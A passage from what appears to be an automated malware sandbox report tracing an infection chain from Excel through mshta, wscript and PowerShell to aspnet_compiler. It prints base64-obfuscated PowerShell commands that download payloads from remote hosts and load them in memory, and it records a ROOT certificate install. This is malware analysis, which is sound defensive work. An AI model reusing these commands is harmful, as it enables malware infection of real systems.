SG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSgkbnVsbCwgQCgndHh0LkFSRU5MRVQvMTYzLzIxLjMyMS41NDIuMjcxLy86cHR0aCcsICckZGFkYW5lJywgJyRkYWRhbmUnLCAnJGRhZGFuZScsICdhc3BuZXRfY29tcGlsZXInLCAnJGRhZGFuZScsICckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCcxJywnJGRhZGFuZScpKTs=';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfoseJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.cmdline"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE899A022D push eax; iretd 8_2_000007FE899A0241
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE899A00BD pushad ; iretd 8_2_000007FE899A00C1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00407041 push cs; iretd 16_2_00407042
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0041705E push edi; iretd 16_2_00417060
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_004030F0 push eax; ret 16_2_004030F2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0041C8FC push cs; iretd 16_2_0041C8C9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00401949 push 63DCA26Ah; ret 16_2_0040194E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0040214B push edx; retf 16_2_0040214E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00402101 push ebp; iretd 16_2_0040210D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0040210E push eax; retf 16_2_0040214A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_004021A4 push eax; retf 16_2_0040214A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0041125B pushfd ; ret 16_2_0041125E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_004242D9 push esp; ret 16_2_00424330
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_004242E3 push esp; ret 16_2_00424330
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00401AB8 push edx; retf 16_2_00401AE3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00413416 push ecx; iretd 16_2_00413417
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0041ECDC push ds; iretd 16_2_0041ECDD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00401DF5 push ebp; iretd 16_2_00401DB2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00401DA6 push ebp; iretd 16_2_00401DB2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00416EAA push esp; retf 16_2_00416EAB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00401F0D push eax; retf 16_2_00401F19
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00401FEB push edx; retf 16_2_00401FEC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00410FEE push ebp; iretd 16_2_00411000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00410FF3 push ebp; iretd 16_2_00411000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00401FA4 push edx; ret 16_2_00401FAD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00401FBA push 0000006Ah; iretd 16_2_00401FC6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A9DFA1 push ecx; ret 16_2_00A9DFB4

              Persistence and Installation Behavior

              barindex
              Installs new ROOT certificates
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.dllJump to dropped file
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
